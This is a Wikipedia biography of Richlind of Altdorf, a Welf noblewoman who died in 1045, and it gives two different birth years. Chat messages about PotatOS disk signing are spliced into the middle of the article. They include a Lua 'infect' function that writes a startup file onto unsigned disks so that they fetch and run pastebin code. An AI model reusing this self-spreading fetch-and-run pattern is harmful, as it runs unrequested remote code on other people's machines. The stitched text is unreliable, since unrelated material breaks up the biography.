Richlind of Altdorf

Richlind of Altdorf (c.990- 12 June 1045[1]) was a German noblewoman and a member of the Swabian line of the Elder House of Welf.

Richlind of Altdorf
Bornc.980
Died(1045-06-12)12 June 1045
Noble familyElder House of Welf
Spouse(s)Adalbert II, count of Ebersberg
FatherRudolf II, Count of Altdorf
MotherIda of Swabia

Life

Richlind was the daughter of Rudolf II, Count of Altdorf and Ita (or Ida), daughter of Conrad I, Duke of Swabia.[2] She was married to Adalbert II, count of Ebersberg. The couple had no children.

When Richlind’s husband, Adalbert, was dying (in March 1045) he made a donation to the monastery of Ebersberg and left his remaining property to his wife.[3] Richlind enlisted the help of Emperor Henry III, to transfer this property to her nephew, Welf III, the son of her brother, Welf II.[4]

Richlind died on 12 June 1045, when a building in which she was standing collapsed.[5]

gollark: If you have the private key, you can generate signatures for any startup. You don't, though. The stuff written onto disks *also* has a UUID embedded (on the more complex ones), which is part of the signed bit.
gollark: The signatures are programatically generated from the contents of the file and my private key. PotatOS has the *public* key, so it can verify that the signature was generated from the corresponding private key.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```

References

  • B. Schneidmüller, Die Welfen. Herrschaft und Erinnerung (819–1252). (Stuttgart, 2000)
  • H. Dopsch, ‘Welf III und Kärnten’ in D. Bauer, et al., eds., Welf IV. - Schlüsselfigur einer Wendezeit: Regionale und europäische Perspektiven (Munich, 2004), pp. 84–128.

Notes

  1. Notae necrologiae Ebersbergenses, p. 78.
  2. Schneidmüller, Die Welfen, p. 115
  3. Chronicon Ebersbergense, a. 1045, p. 14.
  4. Schneidmüller, Die Welfen, pp. 123-124; Dopsch, ‘Welf III,’ pp. 96-97
  5. Chronicon Ebersbergense, a. 1045, p. 14.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.